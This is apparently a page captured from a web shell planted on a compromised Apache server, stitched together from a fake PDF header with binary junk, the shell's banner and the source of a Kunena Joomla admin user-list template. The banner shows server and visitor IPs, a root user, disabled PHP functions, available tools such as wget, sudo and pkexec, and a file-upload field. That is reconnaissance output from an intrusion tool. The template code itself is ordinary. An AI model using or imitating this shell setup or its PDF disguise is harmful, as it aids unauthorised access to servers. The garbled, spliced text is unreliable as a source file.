%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 49.231.201.246 / Your IP : 216.73.216.149 Web Server : Apache/2.4.18 (Ubuntu) System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 User : root ( 0) PHP Version : 7.0.33-0ubuntu0.16.04.16 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/old/administrator/components/com_kunena/template/joomla25/users/ |
Upload File : |
<?php /** * Kunena Component * @package Kunena.Administrator.Template * @subpackage Users * * @copyright (C) 2008 - 2014 Kunena Team. All rights reserved. * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL * @link http://www.kunena.org **/ defined ( '_JEXEC' ) or die (); JHtml::_('behavior.tooltip'); /** @var KunenaAdminViewUsers $this */ ?> <script type="text/javascript"> Joomla.orderTable = function() { var dirn = ''; var table = document.getElementById("sortTable"); var direction = document.getElementById("directionTable"); var order = table.options[table.selectedIndex].value; if (order != '<?php echo $this->listOrdering; ?>') { dirn = 'asc'; } else { dirn = direction.options[direction.selectedIndex].value; } Joomla.tableOrdering(order, dirn, ''); } </script> <div id="kunena" class="admin override"> <div class="container-fluid"> <div class="row-fluid"> <div class="span12"> <div id="j-sidebar-container" class="span2"> <div id="sidebar"> <div class="sidebar-nav"><?php include KPATH_ADMIN.'/template/joomla25/common/menu.php'; ?></div> </div> </div> <div id="j-main-container" class="span10"> <form action="<?php echo KunenaRoute::_('administrator/index.php?option=com_kunena&view=users') ?>" method="post" id="adminForm" name="adminForm"> <input type="hidden" name="view" value="users" /> <input type="hidden" name="task" value="" /> <input type="hidden" name="filter_order" value="<?php echo $this->escape($this->listOrdering) ?>" /> <input type="hidden" name="filter_order_Dir" value="<?php echo $this->escape($this->listDirection) ?>" /> <input type="hidden" name="boxchecked" value="0" /> <?php echo JHtml::_( 'form.token' ); ?> <?php if($this->filterActive || $this->pagination->total > 0) : ?> <div id="filter-bar" class="btn-toolbar"> <div class="filter-search btn-group pull-left"> <label for="filter_search" class="element-invisible"><?php echo JText::_('COM_KUNENA_FIELD_LABEL_SEARCHIN');?></label> <input type="text" name="filter_search" id="filter_search" class="filter" placeholder="<?php echo JText::_('COM_KUNENA_FIELD_INPUT_SEARCH'); ?>" value="<?php echo $this->escape($this->state->get('list.search')); ?>" title="<?php echo JText::_('COM_KUNENA_FIELD_INPUT_SEARCH'); ?>" /> </div> <div class="btn-group pull-left"> <button class="btn tip" type="submit" ><?php echo JText::_('COM_KUNENA_SYS_BUTTON_FILTERSUBMIT'); ?></button> <button class="btn tip" type="button" onclick="document.getElements('.filter').set('value', '');this.form.submit();"><?php echo JText::_('COM_KUNENA_SYS_BUTTON_FILTERRESET'); ?></button> </div> <div class="btn-group pull-right hidden-phone"> <label for="limit" class="element-invisible"><?php echo JText::_('JFIELD_PLG_SEARCH_SEARCHLIMIT_DESC');?></label> <?php echo KunenaLayout::factory('pagination/limitbox')->set('pagination', $this->pagination); ?> </div> <div class="btn-group pull-right hidden-phone"> <label for="directionTable" class="element-invisible"><?php echo JText::_('JFIELD_ORDERING_DESC');?></label> <select name="directionTable" id="directionTable" class="input-medium" onchange="Joomla.orderTable()"> <option value=""><?php echo JText::_('JFIELD_ORDERING_DESC');?></option> <?php echo JHtml::_('select.options', $this->sortDirectionFields, 'value', 'text', $this->listDirection);?> </select> </div> <div class="btn-group pull-right"> <label for="sortTable" class="element-invisible"><?php echo JText::_('COM_KUNENA_SORT_TABLE_BY');?></label> <select name="sortTable" id="sortTable" class="input-medium" onchange="Joomla.orderTable()"> <option value=""><?php echo JText::_('COM_KUNENA_SORT_TABLE_BY');?></option> <?php echo JHtml::_('select.options', $this->sortFields, 'value', 'text', $this->listOrdering);?> </select> </div> <div class="clearfix"></div> </div> <table class="table table-striped"> <thead> <tr> <th align="center" width="1%"><input type="checkbox" name="toggle" value="" onclick="checkAll(<?php echo count ( $this->users ); ?>);" /></th> <th align="left"><?php echo JHtml::_('grid.sort', 'COM_KUNENA_USRL_USERNAME', 'username', $this->listDirection, $this->listOrdering ); ?></th> <th><?php echo JHtml::_('grid.sort', 'COM_KUNENA_GEN_EMAIL', 'email', $this->listDirection, $this->listOrdering ); ?></th> <th width="5%" class="nowrap center"><?php echo JHtml::_('grid.sort', 'COM_KUNENA_GEN_SIGNATURE', 'signature', $this->listDirection, $this->listOrdering ); ?></th> <th width="5%" class="nowrap center"><?php echo JHtml::_('grid.sort', 'COM_KUNENA_USRL_ENABLED', 'enabled', $this->listDirection, $this->listOrdering ); ?></th> <th width="5%" class="nowrap center"><?php echo JHtml::_('grid.sort', 'COM_KUNENA_USRL_BANNED', 'banned', $this->listDirection, $this->listOrdering ); ?></th> <th width="5%" class="nowrap center"><?php echo JHtml::_('grid.sort', 'COM_KUNENA_VIEW_MODERATOR', 'moderator', $this->listDirection, $this->listOrdering ); ?></th> <th width="1%" class="nowrap center"><?php echo JHtml::_('grid.sort', 'COM_KUNENA_ANN_ID', 'id', $this->listDirection, $this->listOrdering ); ?></th> </tr> <tr> <td> </td> <td class="nowrap"> <label for="filter_username" class="element-invisible"><?php echo JText::_('COM_KUNENA_FIELD_LABEL_SEARCH_IN');?>:</label> <input class="input-block-level input-filter filter" type="text" name="filter_username" id="filter_username" placeholder="<?php echo JText::_('COM_KUNENA_SYS_BUTTON_FILTERSUBMIT') ?>" value="<?php echo $this->filterUsername; ?>" title="<?php echo JText::_('COM_KUNENA_SYS_BUTTON_FILTERSUBMIT') ?>" /> </td> <td class="nowrap"> <label for="filter_email" class="element-invisible"><?php echo JText::_('COM_KUNENA_FIELD_LABEL_SEARCH_IN');?>:</label> <input class="input-block-level input-filter filter" type="text" name="filter_email" id="filter_email" placeholder="<?php echo JText::_('COM_KUNENA_SYS_BUTTON_FILTERSUBMIT') ?>" value="<?php echo $this->filterEmail; ?>" title="<?php echo JText::_('COM_KUNENA_SYS_BUTTON_FILTERSUBMIT') ?>" /> </td> <td class="nowrap center"> <label for="filter_signature" class="element-invisible"><?php echo JText::_('COM_KUNENA_FIELD_LABEL_ALL');?></label> <select name="filter_signature" id="filter_signature" class="select-filter filter" onchange="Joomla.orderTable()"> <option value=""><?php echo JText::_('COM_KUNENA_FIELD_LABEL_ALL');?></option> <?php echo JHtml::_('select.options', $this->signatureOptions(), 'value', 'text', $this->filterSignature); ?> </select> </td> <td class="nowrap center"> <label for="filter_block" class="element-invisible"><?php echo JText::_('COM_KUNENA_FIELD_LABEL_ALL');?></label> <select name="filter_block" id="filter_block" class="select-filter filter" onchange="Joomla.orderTable()"> <option value=""><?php echo JText::_('COM_KUNENA_FIELD_LABEL_ALL');?></option> <?php echo JHtml::_('select.options', $this->blockOptions(), 'value', 'text', $this->filterBlock, true); ?> </select> </td> <td class="nowrap center"> <label for="filter_banned" class="element-invisible"><?php echo JText::_('COM_KUNENA_FIELD_LABEL_ALL');?></label> <select name="filter_banned" id="filter_banned" class="select-filter filter" onchange="Joomla.orderTable()"> <option value=""><?php echo JText::_('COM_KUNENA_FIELD_LABEL_ALL');?></option> <?php echo JHtml::_('select.options', $this->bannedOptions(), 'value', 'text', $this->filterBanned); ?> </select> </td> <td class="nowrap center"> <label for="filter_moderator" class="element-invisible"><?php echo JText::_('COM_KUNENA_FIELD_LABEL_ALL');?></label> <select name="filter_moderator" id="filter_moderator" class="select-filter filter" onchange="Joomla.orderTable()"> <option value=""><?php echo JText::_('COM_KUNENA_FIELD_LABEL_ALL');?></option> <?php echo JHtml::_('select.options', $this->moderatorOptions(), 'value', 'text', $this->filterModerator); ?> </select> </td> <td class="nowrap center"> </td> </tr> </thead> <tfoot> <tr> <td colspan="11"> <?php echo KunenaLayout::factory('pagination/footer')->set('pagination', $this->pagination); ?> </td> </tr> </tfoot> <tbody> <?php $k = 1; $i = 0; $img_yes = '<span class="state publish"><span class="text">Enabled</span></span>'; $img_no = '<span class="state unpublish"><span class="text">Disabled</span></span>'; if($this->pagination->total > 0) : foreach($this->users as $user) { $userEnabled = $user->isBlocked() ? $img_no : $img_yes; $userBlockTask = $user->isBlocked() ? 'unblock' : 'block'; $titleUserBlock = $user->isBlocked() ? JText::_( 'COM_KUNENA_USERS_LABEL_BLOCKED' ) : JText::_( 'COM_KUNENA_USERS_LABEL_ENABLED' ); $userBanned = $user->isBanned() ? $img_yes : $img_no; $userBannedTask = $user->isBanned() ? 'unban' : 'ban'; $titleUserBanned = $user->isBanned() ? JText::_( 'COM_KUNENA_USERS_LABEL_BANNED' ) : JText::_( 'COM_KUNENA_USERS_LABEL_NOT_BANNED' ); ?> <tr class="row<?php echo $k; ?>"> <td class="center"> <?php echo JHtml::_('grid.id', $i, intval($user->userid)) ?> </td> <td> <span class="editlinktip hasTip" title="<?php echo $this->escape($user->username.'::'.$user->getAvatarImage('kavatar', 128, 128)); ?>"> <?php echo $user->getAvatarImage('kavatar', 24, 24); ?> <a href="#edit" onclick="return listItemTask('cb<?php echo $i; ?>','edit')"><?php echo $this->escape($user->username); ?></a> <small> <?php echo JText::sprintf('(Name: %s)', $this->escape($user->name));?> </small> </span> </td> <td> <a href="#edit" onclick="return listItemTask('cb<?php echo $i; ?>','edit')"><?php echo $this->escape($user->email); ?></a> </td> <td class="center"> <span class="editlinktip <?php echo ($user->signature ? 'hasTip':''); ?>" title="<?php echo $this->escape($user->signature); ?> "> <?php if ($user->signature) { ?> <a href="#edit" onclick="return listItemTask('cb<?php echo $i; ?>','edit')"><?php echo JText::_('COM_KUNENA_YES'); ?></a> <?php } else { ?> <a href="#edit" onclick="return listItemTask('cb<?php echo $i; ?>','edit')"><?php echo JText::_('COM_KUNENA_NO'); ?></a> <?php } ?> </span> </td> <td class="center"> <a class="jgrid" title="<?php echo $titleUserBlock ?>" href="javascript:void(0);" onclick="return listItemTask('cb<?php echo $i;?>','<?php echo $userBlockTask; ?>')"> <?php echo $userEnabled; ?> </a> </td> <td class="center"> <a class="jgrid" title="<?php echo $titleUserBanned ?>" href="javascript:void(0);" onclick="return listItemTask('cb<?php echo $i;?>','<?php echo $userBannedTask; ?>')"> <?php echo $userBanned; ?> </a> </td> <td class="center"> <?php if ($user->moderator) { echo JText::_('COM_KUNENA_YES'); } else { echo JText::_('COM_KUNENA_NO'); } ?> </td> <td width="1%" class="center"> <?php echo $this->escape($user->userid); ?> </td> </tr> <?php $i++; $k = 1 - $k; } else : ?> <tr> <td colspan="10"> <div class="well center filter-state"> <span><?php echo JText::_('COM_KUNENA_FILTERACTIVE'); ?> <?php /*<a href="#" onclick="document.getElements('.filter').set('value', '');this.form.submit();return false;"><?php echo JText::_('COM_KUNENA_FIELD_LABEL_FILTERCLEAR'); ?></a> */?> <button class="btn" type="button" onclick="document.getElements('.filter').set('value', '');this.form.submit();"><?php echo JText::_('COM_KUNENA_FIELD_LABEL_FILTERCLEAR'); ?></button> </span> </div> </td> </tr> <?php endif; ?> </tbody> </table> <?php else : ?> <div class="well well-large center filter-state"> <span><?php echo JText::_('COM_KUNENA_FILTERACTIVE'); ?> <?php /*<a href="#" onclick="document.getElements('.filter').set('value', '');this.form.submit();return false;"><?php echo JText::_('COM_KUNENA_FIELD_LABEL_FILTERCLEAR'); ?></a> */?> </span> </div> <?php endif; ?> <?php //Load the batch processing form. ?> <?php echo $this->loadTemplateFile('moderators'); ?> </form> </div> <div class="pull-right small"> <?php echo KunenaVersion::getLongVersionHTML (); ?> </div> </div> </div> </div> </div>